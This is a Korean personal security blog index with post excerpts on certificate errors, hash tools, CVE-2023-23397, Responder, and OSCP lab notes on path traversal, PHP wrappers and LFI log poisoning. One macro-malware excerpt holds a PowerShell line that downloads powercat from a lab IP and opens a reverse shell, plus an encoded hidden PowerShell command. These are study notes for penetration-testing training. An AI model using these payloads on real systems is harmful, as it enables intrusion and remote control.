๋ณธ๋ฌธ ๋ฐ”๋กœ๊ฐ€๊ธฐ
  • Tried. Failed. Logged.
728x90

์ „์ฒด ๊ธ€739

java.security.cert.certpathvalidatorexception trust anchor for certification ์—๋Ÿฌ ISRG Root X1 ํ˜น์ธ ISRG Root X2 .pem ํŒŒ์ผ ์„ค์น˜https://letsencrypt.org/certificates/ Chains of TrustThis page describes all of the current and relevant historical Certification Authorities operated by Let’s Encrypt. Note that a CA is most correctly thought of as a key and a name: any given CA may be represented by multiple certificates which all contailetsencrypt.org์ถœ์ฒ˜: https://github.com/TeamNewPipe/Ne.. 2025. 8. 13.
๋ชจ๋“  ์ธ์ฝ”๋”ฉ ๋””์ฝ”๋”ฉ ๋ฌธ์ž ํ™•์ธ ์‚ฌ์ดํŠธ(dencode.com) https://dencode.com/ DenCode | Encoding & Decoding Online ToolsEncoding and Decoding site. e.g. HTML Escape / URL Encoding / Base64 / MD5 / SHA-1 / CRC32 / and many other String, Number, DateTime, Color, Hash formats!dencode.com 2025. 8. 5.
๋ธ”๋ž™๋ฒ ๋ฆฌ - bar ์„ค์น˜ ๊ด€๋ จ ๋งํฌ BAR ํŒŒ์ผ ์„ค์น˜ ํ”„๋กœ๊ทธ๋žจhttps://github.com/xsacha/Sachesi GitHub - xsacha/Sachesi: Firmware, extractor, searcher and installer for Blackberry 10Firmware, extractor, searcher and installer for Blackberry 10 - xsacha/Sachesigithub.com ํ„ฐ๋ฏธ๋„ ์•ฑ(term-48) ์•„์นด์ด๋ธŒ ์ฃผ์†Œhttps://archive.org/details/term-48_bb10 2025. 7. 30.
์ทจ์•ฝ์  ๋ถ„์„ - CVE-2023-23397 CVE-2023-23397 ์ทจ์•ฝ์  ์ •๋ณดCVE-2023-23397๋Š” Microsoft Windows ์ „์šฉ Outlook์— ์•ฝ์†์„ ์•Œ๋ ค์ฃผ๋Š” ‘๋ฏธ๋ฆฌ ์•Œ๋ฆผ’ ๊ธฐ๋Šฅ์— ์žฌ์ƒํ•  ์‚ฌ์šด๋“œ ํŒŒ์ผ์„ ๋ถˆ๋Ÿฌ์˜ค๊ธฐ ์œ„ํ•ด์„œ ๊ณต๊ฒฉ์ž์˜ SMB ์„œ๋ฒ„๋กœ ์ธ์ฆํ•˜๋Š” ๊ณผ์ •์— NTLM ์ž๊ฒฉ ์ฆ๋ช…์„ ํƒˆ์ทจ๋˜๋Š” ๊ถŒํ•œ ์ƒ์Šน ์ทจ์•ฝ์ ์ž…๋‹ˆ๋‹ค.ํ•ด๋‹น ์ทจ์•ฝ์ ์„ ์ด์šฉํ•˜์—ฌ ๊ถŒํ•œ ์ƒ์Šน์ด ์ด๋ฃจ์–ด์ ธ ๋” ํฐ ํ”ผํ•ด๊ฐ€ ๋ฐœ์ƒํ•  ์ˆ˜ ์žˆ์„ ์ •๋„๋กœ ์œ„ํ—˜๋„๋Š” ๋‹ค์†Œ ๋†’์„ ๊ฒƒ์œผ๋กœ ์˜ˆ์ƒ๋ฉ๋‹ˆ๋‹ค.์กฐ์น˜ ๋ฐฉ์•ˆ์œผ๋กœ Outlook์„ Build 16130.20306 ์ด์ƒ์œผ๋กœ ์—…๋ฐ์ดํŠธ๊ฐ€ ํ•„์š”ํ•˜๋ฉฐ, SMB ์„œ๋น„์Šค๋ฅผ ์ด์šฉํ•˜์ง€ ์•Š์„ ๊ฒฝ์šฐ์—๋Š” ํ•ด๋‹น ์„œ๋น„์Šค๋ฅผ ๋น„ํ™œ์„ฑํ™” ํ•˜๊ฑฐ๋‚˜ SMB TCP/445 ํฌํŠธ ์•„์›ƒ๋ฐ”์šด๋“œ๋ฅผ ์ฐจ๋‹จํ•ฉ๋‹ˆ๋‹ค.CVE Number CVE-2023-23397CVSS Score9.8severity(์‹ฌ๊ฐ๋„).. 2025. 7. 27.
์ทจ์•ฝ์  ๋ถ„์„ - NTLM ํฌ๋ฆฌ๋ด์…œ ํŒจํ‚ท ์Šค๋‹ˆํผ (responder.py) GitHub repohttps://github.com/SpiderLabs/Responder GitHub - SpiderLabs/Responder: Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue autheResponder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authenticat...github.com ์‚ฌ์šฉ ์˜ˆ์‹œ... 2025. 7. 27.
์•…์„ฑ์ฝ”๋“œ ๋ถ„์„ - ๋งคํฌ๋กœ ๋ฌธ์„œ ์•…์„ฑ ํŒŒ์ผ IEX(New-Object System.Net.WebClient).DownloadString('http://192.168.119.2/powercat.ps1');powercat -c 192.168.119.2 -p 4444 -e powershell str = "powershell.exe -nop -w hidden -enc SQBFAFgAKABOAGUAdwA..."n = 50for i in range(0, len(str), n): print("Str = Str + " + '"' + str[i:i+n] + '"')์ฒญํฌํ™”(๋ฌธ์ž์—ด์ด ๋„ˆ๋ฌด ๊ธธ๋ฉด ์˜ค๋ฅ˜๊ฐ€ ๋ฐœ์ƒ) Sub AutoOpen() MyMacroEnd SubSub Document_Open() MyMacroEnd SubSub MyMacro() Di.. 2025. 7. 26.
OSCP - 9.3.2. Using Non-Executable Files ํŒŒ์ผ ์—…๋กœ๋“œ ์‹œ ์‹คํ–‰์ด ๋ถˆ๊ฐ€๋Šฅํ•œ ๊ฒฝ์šฐ(e.g. ์‹คํ–‰ ๊ถŒํ•œ์ด ์—†๋Š” ์—…๋กœ๋“œ ํด๋”)์— ์‚ฌ์šฉํ•  ์ˆ˜ ์žˆ๋Š” ์ทจ์•ฝ์  ๋ถ„์„ ๋ฐฉ๋ฒ•์„ ์•Œ์•„๋ณธ๋‹ค. ์šฐ์„  ํŒŒ์ผ ์—…๋กœ๋“œ ์‹œ filename์— ๋งค๊ฐœ๋ณ€์ˆ˜๋ฅผ ์กฐ์ž‘ํ•˜์—ฌ ../../../../../../../test.txt๋ฅผ ๋„ฃ์–ด ์„œ๋ฒ„๋กœ ์ „๋‹ฌํ•œ ๊ฒฝ์šฐ ์„œ๋ฒ„ ์ธก์ด ์ •์ƒ ์‘๋‹ต์„ ํ•œ ๊ฒฝ์šฐ ์ทจ์•ฝ ๊ฐ€๋Šฅ์„ฑ์ด ์žˆ์„ ์ˆ˜ ์žˆ๋‹ค. ํŠนํžˆ ์—ฌ๊ธฐ์— ๋ฃจํŠธ(/) ๊ฒฝ๋กœ์ž„์—๋„ ์ •์ƒ ์—…๋กœ๋“œ ๋œ ๊ฒƒ์ด๋ผ๋ฉด root์˜ ํ™ˆ๋””๋ ‰ํ„ฐ๋ฆฌ๋„ ์ง์ ‘ ์ ‘๊ทผ์ด ๊ฐ€๋Šฅํ•จ์„ ์•Œ ์ˆ˜ ์žˆ๋‹ค. kali@kali:~$ ssh-keygenGenerating public/private rsa key pair.Enter file in which to save the key (/home/kali/.ssh/id_rsa): fileupEnter passphras.. 2025. 7. 22.
OSCP - 9.2.2. PHP Wrappers admin.php ํŒŒ์ผ ๋‚ด์šฉkali@kali:~$ curl http://mountaindesserts.com/meteor/index.php?page=admin.php...Admin The admin page is currently under maintenance. ๋‹ค์Œ๊ณผ ๊ฐ™์ด LFI๊ฐ€ ๋ฐœ์ƒํ•˜๋Š” ๊ฒฝ์šฐ(์ž…๋ ฅ ๊ฒ€์ฆ ์—†์ด ๋ฐ”๋กœ include ์‹คํ–‰ => include $_GET["page"];)PHP Wrappers์— ์ทจ์•ฝํ•  ์ˆ˜ ์žˆ๋‹ค. admin.php ํŽ˜์ด์ง€ base64 ์ธ์ฝ”๋”ฉ(php://filter)kali@kali:~$ curl http://mountaindesserts.com/meteor/index.php?page=php://filter/convert.base64-encode/resourc.. 2025. 7. 21.
OSCP - 9.2. File Inclusion Vulnerabilities, Labs Local File Inclusion (LFI) ๋ฐ access.log ํฌ์ด์ฆˆ๋‹ ์ทจ์•ฝ์  access.log ํฌ์ด์ฆˆ๋‹(์˜ค์—ผ)User-Agent ํ—ค๋”์— ํ•œ์ค„ ์งœ๋ฆฌ ์›น์‰˜ ์ฝ”๋“œ๋ฅผ ๋„ฃ๋Š”๋‹ค. ์ดํ›„ ์„œ๋ฒ„๋กœ ๋ถ€ํ„ฐ ์š”์ฒญ์ด ๊ฐ€๊ฒŒ ๋˜๋ฉด ์„œ๋ฒ„ ์ธก์— ์•„ํŒŒ์น˜ ๋กœ๊ทธ ํŒŒ์ผ์ธ /var/log/apache2/access.log(์œˆ๋„์šฐ ์˜ˆ์‹œ: C:\xampp\apache\logs\access.log)์—๋Š” ์‚ฌ์šฉ์ž์˜ ๋ฐฉ๋ฌธ ์ •๋ณด(์•„์ดํ”ผ ์ฃผ์†Œ, ๊ฒฝ๋กœ, User-Agent)๊ฐ€ ๋‚จ๊ฒŒ ๋œ๋‹ค. ์ด์ œ LFI ์ทจ์•ฝ์ ์ด ์žˆ๋Š” ํŒŒ๋ผ๋ฏธํ„ฐ์—๋‹ค /var/log/apache2/access.log๋ฅผ ์ž…๋ ฅ์„ ํ•ด ํŒŒ์ผ์„ ์ฝ์–ด ์˜ค๊ฒŒ ๋˜๋ฉด์„œ ํ•ด๋‹น PHP ์ฝ”๋“œ๊ฐ€ ์‹คํ–‰๋˜๋ฉด์„œ ์›๊ฒฉ ์ฝ”๋“œ ์‹คํ–‰ ์ทจ์•ฝ์ด ๋ฐœ์ƒํ•œ๋‹ค. (*cmd ํŒŒ๋ผ๋ฏธํ„ฐ ์•ž์—๋Š” ?๊ฐ€ ์•„๋‹Œ &์ด ์˜ฌ ๊ฒƒ) nc -nvlp 4444์ข€ ๋” ์›ํ™œํ•œ ์ œ์–ด๋ฅผ ์œ„ํ•œ ๊ฒฝ์šฐ ๊ณต๊ฒฉ์ž๋Š” ๋ฆฌ๋ฒ„์Šค์‰˜์„ ์—ด์–ด ๋Œ€์ƒ ์„œ๋ฒ„๊ฐ€ ์—ฐ๊ฒฐ์„.. 2025. 7. 21.
OSCP - 9.1. Directory Traversal, Labs CVE-2021-43 --path-as-is ์ทจ์•ฝ์  ๊ฐœ์š”Grafana 8.x ๋ฒ„์ „์—์„œ ๋ฐœ์ƒ ํ•˜๋Š” Path Traversal ์ทจ์•ฝ์ ์ด๋‹ค. ํ”Œ๋Ÿฌ๊ทธ์ธ API ์—”๋“œํฌ์ธํŠธ์˜ ๊ฒฝ๋กœ์— ๋Œ€ํ•œ ์‚ฌ์šฉ์ž ์ž…๋ ฅ์— ๋Œ€ํ•œ ๊ฒ€์ฆ์ด ๋ฏธํกํ•˜์—ฌ ์„œ๋น„์Šค ์˜์—ญ ์™ธ์˜ ์ƒ์œ„ ๋””๋ ‰ํ„ฐ๋ฆฌ ๋“ฑ์— ์•ก์„ธ์Šค๊ฐ€ ๊ฐ€๋Šฅํ•˜๊ฒŒ ๋œ๋‹ค. ๋ฌธ์ œ์˜ ์ฝ”๋“œ : https://github.com/grafana/grafana/blob/c80e7764d84d531fa56dca14d5b96cf0e7099c47/pkg/api/plugins.go#L284 ์ฐธ๊ณ https://github.com/taythebot/CVE-2021-43798 GitHub - taythebot/CVE-2021-43798: CVE-2021-43798 - Grafana 8.x Path Traversal (Pre-Auth)CVE-2021-43798 - Grafan.. 2025. 7. 21.
์‹œ์Šคํ…œ ๋ณด์•ˆ - ํ•ด์‹œ(MD5, SHA1, SHA256) ํ™•์ธ ์‚ฌ์ดํŠธ ๋ชจ์Œ ํ•ด์‹œ ์‹๋ณ„ https://hashes.com/en/tools/hash_identifier Hash Type Identifier - Identify unknown hashesIdentify and detect unknown hashes using this tool. This page will tell you what type of hash a given string is. If you want to attempt to Decrypt them, click this link instead. Decrypt Hasheshashes.com ํ•ด์‹œ ๋ณตํ˜ธํ™” https://hashes.com/en/decrypt/hash Decrypt MD5, SHA1, MySQL, NTLM, SHA256, MD5 Email, SHA256.. 2025. 7. 18.
Oracle DB - ์‚ฌ์šฉ์ž ๊ถŒํ•œ ๋ฐ ํ…Œ์ด๋ธ” ํ™•์ธ ์ฟผ๋ฆฌ๋ฌธ --ํ˜„์žฌ ์‚ฌ์šฉ์ž ํ™•์ธ SQL: SELECT USER FROM DUAL;-- ์„ธ์…˜ ์‚ฌ์šฉ์ž ํ™•์ธ:SELECT SYS_CONTEXT('USERENV','SESSION_USER') FROM DUAL;-- ๊ถŒํ•œ ํ™•์ธ:SELECT * FROM SESSION_PRIVS;-- DBA ์—ฌ๋ถ€ ํ™•์ธ:SELECT * FROM USER_ROLE_PRIVS;-- ํ…Œ์ด๋ธ” ๋ชฉ๋ก ํ™•์ธSELECT table_name FROM user_tables; 2025. 7. 17.
728x90